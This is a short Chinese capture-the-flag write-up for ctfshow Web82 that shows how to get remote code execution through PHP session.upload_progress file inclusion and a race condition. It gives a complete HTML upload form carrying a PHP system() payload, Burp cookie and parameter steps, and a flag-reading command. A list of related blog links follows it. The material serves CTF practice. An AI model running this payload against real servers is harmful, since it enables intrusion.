文件包涵条件竞争(ctfshow82)

Web82

利用 session.upload_progress 包含文件漏洞

<!DOCTYPE html>

<html>

<body>

<form action="https://09558c1b-9569-4abd-bf78-86c4a6cb6608.challenge.ctf.show//" method="POST" enctype="multipart/form-data">

<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls'); ?>" />

<input type="file" name="file" />

<input type="submit" value="submit" />

</form>

</body>

</html>

<?php

session_start();

?>

修改url地址,修改命令

上传文件bp抓包

添加cookie,清除参数

Cookie: PHPSESSID=exp

?file=/tmp/sess_exp

抓包发送到攻击模块

开始攻击

<?php system('cat fl0g.php'); ?>

相关推荐
大方子9 小时前
【好靶场】文件上传漏洞(上传HTML弹XSS)
网络安全·好靶场
汤愈韬10 小时前
IP安全 SEC VPN_2
网络·网络协议·安全·网络安全·security
Kay_Liang11 小时前
VirtualBox NAT 网络实现三台虚拟机互联踩坑实录
网络·windows·笔记·ubuntu·网络安全
hhhhde_12 小时前
CTFSHOW web入门 JWT web345-web350
web·jwt·ctfshow
持敬chijing12 小时前
BUUCTF-WEB详细解题攻略第二页(按解出数降序排序)正在更新
安全·web安全·网络安全·网络攻击模型·安全威胁分析
txg66612 小时前
网络安全领域简报(2026-05-17—2026-05-24)
深度学习·安全·网络安全
宋浮檀s1 天前
应急响应(系统日志)
linux·运维·网络安全·应急响应
夏天测1 天前
SRC 漏洞挖掘实战|反射型 XSS 漏洞详解、复现全流程与 SRC 报告模板
网络安全·web 安全·src 漏洞挖掘·反射型 xss·漏洞报告模板
谪星·阿凯1 天前
内网渗透之横向移动实战
网络·web安全·网络安全
马立杰1 天前
山石A系列智能防火墙如何通过Sysloader模式下重置Administrator密码
网络安全·防火墙